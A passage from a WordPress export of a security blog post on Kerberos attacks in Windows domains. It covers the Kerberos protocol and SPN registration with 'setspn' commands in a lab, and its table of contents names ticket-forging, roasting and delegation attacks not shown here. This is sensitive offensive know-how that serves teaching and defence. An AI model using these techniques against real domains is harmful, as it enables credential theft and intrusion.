{"id":572,"date":"2020-04-28T21:37:13","date_gmt":"2020-04-28T21:37:13","guid":{"rendered":"http:\/\/blog.redforce.io\/?p=572"},"modified":"2024-12-14T15:24:04","modified_gmt":"2024-12-14T15:24:04","slug":"windows-authentication-attacks-part-2-kerberos","status":"publish","type":"post","link":"https:\/\/blog.redforce.io\/windows-authentication-attacks-part-2-kerberos\/","title":{"rendered":"Windows authentication attacks part 2 &#8211; kerberos"},"content":{"rendered":"<h1><span class=\"ez-toc-section\" id=\"Arabic\"><\/span>Arabic<span class=\"ez-toc-section-end\"><\/span><\/h1><div id=\"ez-toc-container\" class=\"ez-toc-v2_0_71 ez-toc-wrap-right counter-hierarchy ez-toc-counter ez-toc-transparent ez-toc-container-direction\">\n<p class=\"ez-toc-title\" style=\"cursor:inherit\">Table of Contents<\/p>\n<label for=\"ez-toc-cssicon-toggle-item-69d7fe40b7a9f\" class=\"ez-toc-cssicon-toggle-label\"><span class=\"\"><span class=\"eztoc-hide\" style=\"display:none;\">Toggle<\/span><span class=\"ez-toc-icon-toggle-span\"><svg style=\"fill: #ff0000;color:#ff0000\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" class=\"list-377408\" width=\"20px\" height=\"20px\" viewBox=\"0 0 24 24\" fill=\"none\"><path d=\"M6 6H4v2h2V6zm14 0H8v2h12V6zM4 11h2v2H4v-2zm16 0H8v2h12v-2zM4 16h2v2H4v-2zm16 0H8v2h12v-2z\" fill=\"currentColor\"><\/path><\/svg><svg style=\"fill: #ff0000;color:#ff0000\" class=\"arrow-unsorted-368013\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"10px\" height=\"10px\" viewBox=\"0 0 24 24\" version=\"1.2\" baseProfile=\"tiny\"><path d=\"M18.2 9.3l-6.2-6.3-6.2 6.3c-.2.2-.3.4-.3.7s.1.5.3.7c.2.2.4.3.7.3h11c.3 0 .5-.1.7-.3.2-.2.3-.5.3-.7s-.1-.5-.3-.7zM5.8 14.7l6.2 6.3 6.2-6.3c.2-.2.3-.5.3-.7s-.1-.5-.3-.7c-.2-.2-.4-.3-.7-.3h-11c-.3 0-.5.1-.7.3-.2.2-.3.5-.3.7s.1.5.3.7z\"\/><\/svg><\/span><\/span><\/label><input type=\"checkbox\"  id=\"ez-toc-cssicon-toggle-item-69d7fe40b7a9f\" checked aria-label=\"Toggle\" \/><nav><ul class='ez-toc-list ez-toc-list-level-1 ' ><li class='ez-toc-page-1 ez-toc-heading-level-1'><a class=\"ez-toc-link ez-toc-heading-1\" href=\"https:\/\/blog.redforce.io\/windows-authentication-attacks-part-2-kerberos\/#Arabic\" title=\"Arabic\">Arabic<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-1'><a class=\"ez-toc-link ez-toc-heading-2\" href=\"https:\/\/blog.redforce.io\/windows-authentication-attacks-part-2-kerberos\/#Overview\" title=\"Overview\">Overview<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-1'><a class=\"ez-toc-link ez-toc-heading-3\" href=\"https:\/\/blog.redforce.io\/windows-authentication-attacks-part-2-kerberos\/#Service_Principal_Names_SPNs\" title=\"Service Principal Names (SPNs)\">Service Principal Names (SPNs)<\/a><ul class='ez-toc-list-level-2' ><li class='ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-4\" href=\"https:\/\/blog.redforce.io\/windows-authentication-attacks-part-2-kerberos\/#Summary\" title=\"Summary\">Summary<\/a><\/li><\/ul><\/li><li class='ez-toc-page-1 ez-toc-heading-level-1'><a class=\"ez-toc-link ez-toc-heading-5\" href=\"https:\/\/blog.redforce.io\/windows-authentication-attacks-part-2-kerberos\/#Kerberos_authentication\" title=\"Kerberos authentication\">Kerberos authentication<\/a><ul class='ez-toc-list-level-2' ><li class='ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-6\" href=\"https:\/\/blog.redforce.io\/windows-authentication-attacks-part-2-kerberos\/#Setting_up\" title=\"Setting up\">Setting up<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-7\" href=\"https:\/\/blog.redforce.io\/windows-authentication-attacks-part-2-kerberos\/#In_a_nutshell\" title=\"In a nutshell\">In a nutshell<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-8\" href=\"https:\/\/blog.redforce.io\/windows-authentication-attacks-part-2-kerberos\/#Pre_AS-REQ\" title=\"Pre AS-REQ\">Pre AS-REQ<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-9\" href=\"https:\/\/blog.redforce.io\/windows-authentication-attacks-part-2-kerberos\/#KRB5KDC_ERR_PREAUTH_REQUIRED\" title=\"KRB5KDC_ERR_PREAUTH_REQUIRED\">KRB5KDC_ERR_PREAUTH_REQUIRED<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-10\" href=\"https:\/\/blog.redforce.io\/windows-authentication-attacks-part-2-kerberos\/#AS-REQ\" title=\"AS-REQ\">AS-REQ<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-11\" href=\"https:\/\/blog.redforce.io\/windows-authentication-attacks-part-2-kerberos\/#AS-REP\" title=\"AS-REP\">AS-REP<\/a><ul class='ez-toc-list-level-3' ><li class='ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-12\" href=\"https:\/\/blog.redforce.io\/windows-authentication-attacks-part-2-kerberos\/#Message_A\" title=\"Message A\">Message A<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-13\" href=\"https:\/\/blog.redforce.io\/windows-authentication-attacks-part-2-kerberos\/#Message_B_TGT\" title=\"Message B (TGT)\">Message B (TGT)<\/a><\/li><\/ul><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-14\" href=\"https:\/\/blog.redforce.io\/windows-authentication-attacks-part-2-kerberos\/#TGS-REQ\" title=\"TGS-REQ\">TGS-REQ<\/a><ul class='ez-toc-list-level-3' ><li class='ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-15\" href=\"https:\/\/blog.redforce.io\/windows-authentication-attacks-part-2-kerberos\/#Message_C\" title=\"Message C\">Message C<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-16\" href=\"https:\/\/blog.redforce.io\/windows-authentication-attacks-part-2-kerberos\/#Message_D\" title=\"Message D\">Message D<\/a><\/li><\/ul><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-17\" href=\"https:\/\/blog.redforce.io\/windows-authentication-attacks-part-2-kerberos\/#TGS-REP\" title=\"TGS-REP\">TGS-REP<\/a><ul class='ez-toc-list-level-3' ><li class='ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-18\" href=\"https:\/\/blog.redforce.io\/windows-authentication-attacks-part-2-kerberos\/#Message_E\" title=\"Message E\">Message E<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-19\" href=\"https:\/\/blog.redforce.io\/windows-authentication-attacks-part-2-kerberos\/#Message_F\" title=\"Message F\">Message F<\/a><\/li><\/ul><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-20\" href=\"https:\/\/blog.redforce.io\/windows-authentication-attacks-part-2-kerberos\/#Accessing_the_service_AP-REQ\" title=\"Accessing the service (AP-REQ)\">Accessing the service (AP-REQ)<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-21\" href=\"https:\/\/blog.redforce.io\/windows-authentication-attacks-part-2-kerberos\/#Authorization\" title=\"Authorization\">Authorization<\/a><\/li><\/ul><\/li><li class='ez-toc-page-1 ez-toc-heading-level-1'><a class=\"ez-toc-link ez-toc-heading-22\" href=\"https:\/\/blog.redforce.io\/windows-authentication-attacks-part-2-kerberos\/#Kerberos_attacks\" title=\"Kerberos attacks\">Kerberos attacks<\/a><ul class='ez-toc-list-level-2' ><li class='ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-23\" href=\"https:\/\/blog.redforce.io\/windows-authentication-attacks-part-2-kerberos\/#Silver_ticket\" title=\"Silver ticket\">Silver ticket<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-24\" href=\"https:\/\/blog.redforce.io\/windows-authentication-attacks-part-2-kerberos\/#Golden_ticket\" title=\"Golden ticket\">Golden ticket<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-25\" href=\"https:\/\/blog.redforce.io\/windows-authentication-attacks-part-2-kerberos\/#Overpass_the_hash\" title=\"Overpass the hash\">Overpass the hash<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-26\" href=\"https:\/\/blog.redforce.io\/windows-authentication-attacks-part-2-kerberos\/#Kerbroasting\" title=\"Kerbroasting\">Kerbroasting<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-27\" href=\"https:\/\/blog.redforce.io\/windows-authentication-attacks-part-2-kerberos\/#AS-REP_Roasting\" title=\"AS-REP Roasting\">AS-REP Roasting<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-28\" href=\"https:\/\/blog.redforce.io\/windows-authentication-attacks-part-2-kerberos\/#Unconstrained_Delegation\" title=\"Unconstrained Delegation\">Unconstrained Delegation<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-29\" href=\"https:\/\/blog.redforce.io\/windows-authentication-attacks-part-2-kerberos\/#Constrained_delegation\" title=\"Constrained delegation\">Constrained delegation<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-30\" href=\"https:\/\/blog.redforce.io\/windows-authentication-attacks-part-2-kerberos\/#User_enumeration\" title=\"User enumeration\">User enumeration<\/a><\/li><\/ul><\/li><li class='ez-toc-page-1 ez-toc-heading-level-1'><a class=\"ez-toc-link ez-toc-heading-31\" href=\"https:\/\/blog.redforce.io\/windows-authentication-attacks-part-2-kerberos\/#Conclusion\" title=\"Conclusion\">Conclusion<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-1'><a class=\"ez-toc-link ez-toc-heading-32\" href=\"https:\/\/blog.redforce.io\/windows-authentication-attacks-part-2-kerberos\/#References\" title=\"References\">References<\/a><\/li><\/ul><\/nav><\/div>\n\n<p>\u062f\u0647 \u0634\u0631\u062d \u0628\u0627\u0644\u0639\u0631\u0628\u0649 \u0644\u0644\u062c\u0632\u0626\u064a\u0647 \u0627\u0644\u062e\u0627\u0635\u0647 \u0628\u0643\u064a\u0641\u064a\u0629 \u0639\u0645\u0644 \u0627\u0644\u0643\u064a\u0631\u0628\u0631\u0648\u0633<br \/>\n\u0645\u0634 \u0645\u0648\u062c\u0648\u062f \u0641\u064a\u0647\u0627 \u0643\u0644 \u0627\u0644\u0644\u0649 \u0645\u0634\u0631\u0648\u062d \u0641\u0649 \u0627\u0644\u0628\u0644\u0648\u062c \u0647\u0646\u0627 \u0628\u0633 \u0641\u064a\u0647\u0627 \u0627\u0644\u0644\u0649 \u064a\u0643\u0641\u064a\u0643 \u062a\u0641\u0647\u0645 \u0627\u0644\u0645\u0643\u062a\u0648\u0628 \u0647\u0646\u0627 \u0628\u0633\u0647\u0648\u0644\u0647<\/p>\n<p><iframe title=\"Windows authentication attacks - Kerberos\" width=\"1040\" height=\"585\" data-src=\"https:\/\/www.youtube.com\/embed\/p81jGJI6gOQ?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen><\/iframe><noscript><iframe loading=\"lazy\" title=\"Windows authentication attacks - Kerberos\" width=\"1040\" height=\"585\" src=\"https:\/\/www.youtube.com\/embed\/p81jGJI6gOQ?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen><\/iframe><\/noscript><\/p>\n<h1><span class=\"ez-toc-section\" id=\"Overview\"><\/span>Overview<span class=\"ez-toc-section-end\"><\/span><\/h1>\n<p>Kerberos is a centralized authentication protocol, works using tickets instead of the challenge-response mechanism.<br \/>\nUnlike the permanent channels between the client and the servers which are required and used when authenticating and using service via NTLM, Kerberos depends on stateless login mechanism using trust between the parties involved in the authentication process instead.<br \/>\nThe client simply asks for a ticket that proof it&#8217;s identity, cache it and uses it when connecting to services.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-578\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/1.jpg\" alt=\"\" width=\"805\" height=\"214\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-578\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/1.jpg\" alt=\"\" width=\"805\" height=\"214\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/1.jpg 805w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/1-300x80.jpg 300w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/1-768x204.jpg 768w\" sizes=\"auto, (max-width: 805px) 100vw, 805px\" \/><\/noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-579\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/2.jpg\" alt=\"\" width=\"776\" height=\"171\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-579\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/2.jpg\" alt=\"\" width=\"776\" height=\"171\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-579\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/2.jpg\" alt=\"\" width=\"776\" height=\"171\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/2.jpg 744w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/2-300x66.jpg 300w\" sizes=\"auto, (max-width: 776px) 100vw, 776px\" \/><\/noscript><\/noscript><\/p>\n<p>There is no open tunnel between the client and the service for authentication, actually, the whole authentication process (In normal scenarios) takes place between the client and the <span style=\"color: #0000ff;\">KDC<\/span> before even connecting to the service.<br \/>\nBefore proceeding with Kerberos details, we need to make a quick overview regarding Kerberos and put some terms which will be used heavily within this post<br \/>\n1 &#8211; Client: this can be any machine requesting access to any service\u00a0over the network<br \/>\n2 &#8211; Key Distribution Center (<span style=\"color: #0000ff;\">KDC<\/span>) which handle the Kerberos authentication requests, it&#8217;s usually the domain controller or at least has access to the users and services secrets (Hashes) and consists of 2 services,<br \/>\nA &#8211; Authentication server (<span style=\"color: #0000ff;\">AS<\/span>) which receives the client&#8217;s authentication requests<br \/>\nB &#8211; Ticket Granting Service (<span style=\"color: #0000ff;\">TGS<\/span>), which issue tickets to the client to access the services he needs.<br \/>\n3 &#8211; Service: The service you need to gain access to, Both Clients and Services are considered as <span style=\"color: #0000ff;\">principals<\/span>, more on that later.<br \/>\n4 &#8211; <span style=\"color: #0000ff;\">Realm<\/span>, which is the uppercase value of the Domain name in the AD environments.<\/p>\n<p>I don&#8217;t want to flood your brain with terms, so the rest will follow just in their place during walking through the authentication process, but for now, keep the following on mind:<br \/>\n1 &#8211; The whole Kerberos authentication process is going between Client, KDC and service, also it&#8217;s centralized and depends on the trust of the client and the service with the KDC.<br \/>\nThe KDC has access to users and services credentials, it uses these credentials (Secrets) of both user and service to assure the integrity of the user through a cryptographic process which is the main focus of this post.<\/p>\n<p>2 &#8211; Kerberos is used for <strong>authentication<\/strong>, <strong>not authorization<\/strong>.<br \/>\nThis means that Kerberos will help you verify the user&#8217;s identity by checking his login data, but yet it won&#8217;t help you to verify if the user has or doesn&#8217;t have access to the service.<br \/>\nIf John is trying to access MSSQL service at 10.0.0.2, Kerberos <strong>will validate<\/strong> John&#8217;s login credentials, but <strong>won&#8217;t validate<\/strong> if John has access to the Databases on that MSSQL service or not.<br \/>\nThe authorization step depends on the service, Privileged Attribute Certificate (<strong>PAC)<\/strong> and the local machine&#8217;s or service&#8217;s policies are usually used for that matter as will mentioned later.<\/p>\n<p>3 &#8211; Kerberos authentication is host-based, not IP based like NTLM, mean if You got a service hosted at machine win2012.jnkfo.lab (192.168.18.12), You should connect to the hostname of the machine instead of the IP address, otherwise, windows will pick up the NTLM authentication instead of Kerberos.<br \/>\nExample: using windows 10 to connect to SMB at win2012.jnkfo.lab (192.168.18.12) using IP address directly.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-583\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-20-at-7.34.07-PM-1024x192.png\" alt=\"\" width=\"1024\" height=\"192\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-583\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-20-at-7.34.07-PM-1024x192.png\" alt=\"\" width=\"1024\" height=\"192\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-20-at-7.34.07-PM-1024x192.png 1024w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-20-at-7.34.07-PM-300x56.png 300w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-20-at-7.34.07-PM-768x144.png 768w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-20-at-7.34.07-PM-1536x288.png 1536w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-20-at-7.34.07-PM-2048x383.png 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/noscript><\/p>\n<p>NTLM authentication was used, unlike connecting using the hostname where Kerberos authentication is used by default.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-584\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-20-at-7.35.37-PM-1024x193.png\" alt=\"\" width=\"1024\" height=\"193\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-584\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-20-at-7.35.37-PM-1024x193.png\" alt=\"\" width=\"1024\" height=\"193\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-20-at-7.35.37-PM-1024x193.png 1024w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-20-at-7.35.37-PM-300x57.png 300w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-20-at-7.35.37-PM-768x145.png 768w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-20-at-7.35.37-PM-1536x290.png 1536w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-20-at-7.35.37-PM-2048x386.png 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/noscript><\/p>\n<p>This is happening because Kerberos requires a Service Principle Name (SPN) while connecting, and before Windows 10 version 1507 and Windows Server 2016 IP addresses couldn&#8217;t be used as a part of the SPN name, the only hostname could be used.<br \/>\nMore about that at the SPNs part.<\/p>\n<h1><span class=\"ez-toc-section\" id=\"Service_Principal_Names_SPNs\"><\/span>Service Principal Names (SPNs)<span class=\"ez-toc-section-end\"><\/span><\/h1>\n<p>As mentioned earlier, Users and Services which are used through the Kerberos authentication process are called principals, These principals should have a specific formatted name that complies with Kerberos requirements.<br \/>\nYou should differentiate between <span style=\"color: #ff0000;\">UPN<\/span> which is the <span style=\"color: #ff0000;\">user<\/span> principal name and <span style=\"color: #ff0000;\">SPN<\/span> which is the <span style=\"color: #ff0000;\">Service<\/span> principal name<br \/>\nSo to connect to an SMB service at host win2012.jnkfo.lab which has the IP address of 192.168.18.12<br \/>\nBy default, Kerberos isn&#8217;t used to authenticate your client with the SMB using the IP address, it requires what&#8217;s called the SPN, which take the following formats<\/p>\n<blockquote><p>ServiceClass\/Host:Port<\/p><\/blockquote>\n<p>So for MsSQL, You will find the following SPN<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"null\">C:\\Users\\Administrator&gt;setspn -L jnkfo\\mssqlserver\r\nRegistered ServicePrincipalNames for CN=mssqlserver,CN=Users,DC=jnkfo,DC=lab:\r\n        MSSQLSvc\/win2012.jnkfo.lab:1433<\/pre>\n<p><span style=\"color: #ff0000;\">MSSQLSvc<\/span>: is the service class<br \/>\n<span style=\"color: #ff0000;\">win2012.jnkfo.lab<\/span>: is the Host where the service can be found<br \/>\n<span style=\"color: #ff0000;\">1433<\/span>: is the port on which the service is running.<br \/>\nSysadmins can register the service without adding the port number, it&#8217;s not mandatory but it&#8217;s needed in several cases.<\/p>\n<p>Services SPNs must be set before using Kerberos for authentication, otherwise, You&#8217;ll get a KRB5KDC_ERR_S_PRINCIPAL_UNKNOWN error<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-586\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-20-at-8.02.56-PM-1024x159.png\" alt=\"\" width=\"1024\" height=\"159\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-586\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-20-at-8.02.56-PM-1024x159.png\" alt=\"\" width=\"1024\" height=\"159\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-20-at-8.02.56-PM-1024x159.png 1024w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-20-at-8.02.56-PM-300x46.png 300w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-20-at-8.02.56-PM-768x119.png 768w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-20-at-8.02.56-PM-1536x238.png 1536w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-20-at-8.02.56-PM-2048x317.png 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/noscript><\/p>\n<p>An SPN can be registered using<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"null\">setspn -A ServiceClass\/Hostname:Port Domain\\Username<\/pre>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-587\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-20-at-8.06.25-PM-1024x241.png\" alt=\"\" width=\"1024\" height=\"241\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-587\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-20-at-8.06.25-PM-1024x241.png\" alt=\"\" width=\"1024\" height=\"241\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-20-at-8.06.25-PM-1024x241.png 1024w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-20-at-8.06.25-PM-300x71.png 300w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-20-at-8.06.25-PM-768x181.png 768w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-20-at-8.06.25-PM-1536x361.png 1536w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-20-at-8.06.25-PM-2048x481.png 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/noscript><\/p>\n<p>Now I can connect to the service normally<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-588\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-20-at-8.18.27-PM-1024x197.png\" alt=\"\" width=\"1024\" height=\"197\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-588\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-20-at-8.18.27-PM-1024x197.png\" alt=\"\" width=\"1024\" height=\"197\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-20-at-8.18.27-PM-1024x197.png 1024w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-20-at-8.18.27-PM-300x58.png 300w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-20-at-8.18.27-PM-768x147.png 768w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-20-at-8.18.27-PM-1536x295.png 1536w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-20-at-8.18.27-PM.png 2010w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/noscript><\/p>\n<p>After windows server 2016 and Windows 10 version 1507 IP addresses can be used as a part of the SPN, but that&#8217;s not the default and requires updating the client&#8217;s settings which aren&#8217;t our concern today, more details can be found <a href=\"https:\/\/docs.microsoft.com\/en-us\/windows-server\/security\/kerberos\/configuring-kerberos-over-ip\">here<\/a><\/p>\n<p>There are several default SPNs for windows including CIFS, LDAP, Host, terminal services&#8230; etc<br \/>\nThe Host SPN itself including several services beneath it, You will find that the &#8220;host&#8221; SPN is called when executing certain functions.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-589\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-20-at-8.54.58-PM-1024x311.png\" alt=\"\" width=\"1024\" height=\"311\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-589\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-20-at-8.54.58-PM-1024x311.png\" alt=\"\" width=\"1024\" height=\"311\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-20-at-8.54.58-PM-1024x311.png 1024w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-20-at-8.54.58-PM-300x91.png 300w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-20-at-8.54.58-PM-768x234.png 768w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-20-at-8.54.58-PM-1536x467.png 1536w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-20-at-8.54.58-PM-2048x623.png 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/noscript><\/p>\n<p>These services can be obtained from the ADSI<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-590\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/Screen-Shot-2020-04-20-at-9.02.01-PM-1024x636.png\" alt=\"\" width=\"1024\" height=\"636\" \/><noscript><img loading=\"lazy\" 